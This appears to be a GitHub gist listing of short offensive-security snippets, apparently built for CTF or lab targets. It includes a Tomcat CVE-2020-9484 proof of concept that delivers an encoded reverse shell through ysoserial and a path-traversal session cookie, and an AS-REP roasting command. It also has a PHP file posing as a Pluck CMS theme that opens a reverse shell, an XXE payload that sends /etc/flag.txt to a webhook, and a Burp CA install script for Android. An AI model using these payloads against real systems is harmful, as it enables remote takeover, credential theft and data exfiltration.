lethanhphuc noobpk

noobpk / poc.sh
Created September 15, 2020 06:25
CVE-2020-9484-Tomcat-JsessionID-Reverse-Shell-Via-Upload-File
#!/bin/bash
#bash -i >& /dev/tcp/10.10.14.169/4444 0>&1
payload="bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42OS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"
java -jar ysoserial-master.jar CommonsCollections2 "${payload}" > noob.session
curl -F '[email protected]' http://localhost/upload.jsp?email=noob@noob
curl --cookie "JSESSIONID=../../../../../opt/samples/uploads/noob" -L http://localhost/upload.jsp?email=noob@noob
noobpk / check.txt
Created September 23, 2020 18:09
Check user account is actually present in the Active Directory
python3 GetNPUsers.py domain.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
noobpk / install-burp-ca-android.sh
Created December 29, 2020 07:53
Install Burpsuite CA for Android
#!/bin/bash
curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb root && adb remount
adb push cacert.pem "/sdcard/${CERT_HASH}.0"
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts"
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0"
rm -rf cacert.*
noobpk / info.php
Last active August 24, 2021 11:17
Pluck-CMS Theme RCE
<?php
//This is the old default theme of pluck
//Designer: Sander Thijsen, http://www.somp.nl
//You can find pluck at http://www.pluck-cms.org
exec("/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'");
$themedir = "oldstyle_exec";
$themename = "Oldstyle_exec";
$module_space[0] = "main";
$module_space[1] = "footer";
?>
<!ENTITY % file SYSTEM "file:///etc/flag.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'https://webhook.site/55c683be-520b-435f-ad7b-9f9b6053f7d7/?flag=%file;'>">
%all;